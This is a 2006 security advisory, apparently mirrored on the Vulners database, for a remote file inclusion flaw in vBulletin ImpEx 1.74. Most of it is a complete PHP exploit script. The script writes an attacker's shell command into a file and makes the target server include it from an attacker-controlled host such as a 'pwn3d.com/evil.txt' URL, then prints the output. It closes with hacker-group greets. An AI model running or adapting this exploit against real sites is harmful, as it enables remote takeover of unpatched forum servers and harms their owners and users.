Vulners
Lucene search
vBulletin174.txt
`=======================================================================================
XOR Crew :: Security Advisory
3/22/2006
=======================================================================================
vBulletin ImpEx <= 1.74 - Remote Command Execution Vulnerability
=======================================================================================
http://www.xorcrew.net/
http://www.xorcrew.net/ReZEN
=======================================================================================
:: Summary
Vendor : vBulletin
Vendor Site : http://www.vbulletin.com/docs/html/impex
Product(s) : Impex - vBulletin Import / Export System
Version(s) : All
Severity : Medium/High
Impact : Remote Command Execution
Release Date : 3/22/2006
Credits : ReZEN (rezen (a) xorcrew (.) net)
=======================================================================================
I. Description
The ImpEx (Import / Export) system is the core system for importing from
other forum software into vBulletin version 3.5.0 or higher.
=======================================================================================
II. Synopsis
There is a remote file inclusion vulnerability that allows for remote
command execution in the /ImpExData.php file. The bug is here:
require_once ($systempath . 'impex/ImpExDatabase.php');
the $systempath variable is not set prior to being used in the
require_once() function. The vendor and support team have been contacted.
=======================================================================================
Exploit code:
-----BEGIN-----
<?php
/*
vbulletin ImpEx Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gf
url: http://www.xorcrew.net/ReZEN
example:
turl: http://www.target.com/impex/ImpExData.php?systempath=
hurl:http://www.pwn3d.com/evil.txt?
*/
$cmd = $_POST["cmd"];
$turl = $_POST["turl"];
$hurl = $_POST["hurl"];
$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"
."turl:<br><input type=\"text\" name=\"turl\" size=\"90\"
value=\"".$turl."\"><br>"
."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\"
value=\"".$hurl."\"><br>"
."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\"
value=\"".$cmd."\"><br>"
."<input type=\"submit\" value=\"Submit\" name=\"submit\">"
."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";
if (!isset($_POST['submit']))
{
echo $form;
}else{
$file = fopen ("test.txt", "w+");
fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\");
system(\"echo ++END++\"); ?>");
fclose($file);
$file = fopen ($turl.$hurl, "r");
if (!$file) {
echo "<p>Unable to get output.\n";
exit;
}
echo $form;
while (!feof ($file)) {
$line .= fgets ($file, 1024)."<br>";
}
$tpos1 = strpos($line, "++BEGIN++");
$tpos2 = strpos($line, "++END++");
$tpos1 = $tpos1+strlen("++BEGIN++");
$tpos2 = $tpos2-$tpos1;
$output = substr($line, $tpos1, $tpos2);
echo $output;
}
?>
------END------
=======================================================================================
IV. Greets :>
All of xor, Infinity, stokhli, ajax, gml, cijfer, my beautiful girlfriend.
uh ohs!! + /srv/web/lotfree/ + LOTFREE uid 1010 = Lame Frenchies
=======================================================================================
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Apr 2006 00:00Current
7.4High risk
Vulners AI Score7.4